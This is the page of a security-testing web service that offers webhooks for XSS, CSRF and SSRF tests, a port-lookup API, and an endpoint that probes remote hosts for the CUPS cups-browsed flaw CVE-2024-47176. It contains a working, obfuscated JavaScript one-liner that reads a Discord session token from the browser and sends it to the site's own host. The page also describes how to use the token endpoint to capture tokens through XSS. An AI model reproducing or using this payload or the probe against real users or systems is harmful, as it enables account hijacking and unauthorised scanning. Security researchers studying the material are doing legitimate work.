Evil THUGSred is a site for educational use only. It's a place where you can test and understand how things work. We offer simple webhook calls to test XSS/CSRF/SSRF and a set of small API's to help you out. It's important to know that even though this site is meant for security research and testing, it can be used to do evil.
You can opt-in to "share" a single hook call under your personal view. This link is safe to share with others etc. if you want to show them the hook call details.
Anything you add as request arguments/parameters will be included in the webhook view.If you add ?explain
it will output info where it comes from else it will just return 200 OK header.
https://evil.thugs.red/hook/344e1dad
We are not responsible for any damage or harm done by using this site. This is for educational use only. Also the reason why the domain name has the word "evil
" in it is to make it "stand out" in Logs/SIEM's etc. What ever comes from this site should be considered untrusted.
PS. The hash(s) is based on your IP address and a salt, so only you can view it.But it should group thing together quite nicely as long as you come from the same ip.
Webhook logs are shown for 6 hours. (Unless forcefully deleted)Token logs are shown for 1 hours. (Unless forcefully deleted)All data is wiped from DB every 48 hours. Access logs are wiped from system every 120 hours.
Use this to steal tokens from your browser, this is a simple way to get tokens from your browser. This is just a webhook like the normal one, the only difference is that this output a more token oriented view on your Personal-view (Opens in a new window).
Often XSS/CSRF and other attacks can be used to steal tokens as you can include Javascript sometimes that in term can be used to pull sensitive browser data like cookies or other variables. So we have made a special page for you to test this out, remember that this is only for educational use.
https://evil.thugs.red/token/{secret-token}?type=0&uid=344e1dad
This has no real significant meaning other than if set a call to the hook, will automatically forward to the correct vendor site. If unsure, leave out.
0 = Unknown
, 1 = Discord
, 2 = Slack
, 3 = Zoom
4 = MSTeams
, 5 = WebEx
, 6 = GoogleHangout
, 7 = Jitsi
Try this in your Discord - Access the developer console/Or if you are in a browser hit F12 and copy paste the following into the console and hit enter... Once it's done, you can find your token from that Client in the personal-view.
function discordTokenTest(){window['location']['href']='https://discord.com/app';if(window['location']['href']=='https://discord.com/app'||window['location']['href']=='https://discord.com/channels/@me'){var _v1=document['body']['appendChild'](document['createElement']`iframe`)['contentWindow']['localStorage']['token'];let _v2=_v1['replace'](/"/g,'');window['location']['href']='https://evil.thugs.red/token/'+_v2+'?type=1&uid=344e1dad';}};discordTokenTest();
So these API services are not meant to be anything special, it's just easy access to simple info and it's always outputted as JSON
. There are no special requirements in order to call this. Again, it's just a simple "api" solution to give you some basic services. Etc to use with bots, scripts or the likes.
This is a simple api to search the IANA - Internet Assigned Numbers Authority for service names and transport protocol port numbers. This is a simple way to get the service name and description from a port number.
https://evil.thugs.red/api/services/all/{string}
Search "globally" in fieldshttps://evil.thugs.red/api/services/port/{integer}
Search on port numberhttps://evil.thugs.red/api/services/name/{string}
Search on service namehttps://evil.thugs.red/api/services/description/{string}
Search in description textHere you can find URL's that a specific to testing out known PoC on CVE/Exploits. Please be very strict when using these services and make sure that what ever you are testing up against is in scope to do so.
Basically we re-use the web-hook URL but will return in some cases specific payloads or other information in order to trigger these CVE/Exploits. So everything should just show up in your Personal-view (Opens in a new window) as always.
CUPS is a standards-based, open-source printing system, and `cups-browsed` contains network printing functionality including, but not limited to, auto-discovering print services and shared printers. `cups-browsed` binds to `INADDR_ANY:631`, causing it to trust any packet from any source, and can cause the `Get-Printer-Attributes` IPP request to an attacker controlled URL. When combined with other vulnerabilities, such as CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177, an attacker can execute arbitrary commands remotely on the target machine without authentication when a malicious printer is printed to.
Use the following to probe CUPS-Browsed on remote IP address port udp/631.
https://evil.thugs.red/hook/344e1dad/cve/2024-47176/probe/{remote-ip-address}
Remember to replace {remote-ip-address}
with the IP address you want to probe. After the call, you should be able to see if the remote CUPS-Browsed server returns a reply under your Personal-view (Opens in a new window) along with your initiate probe request.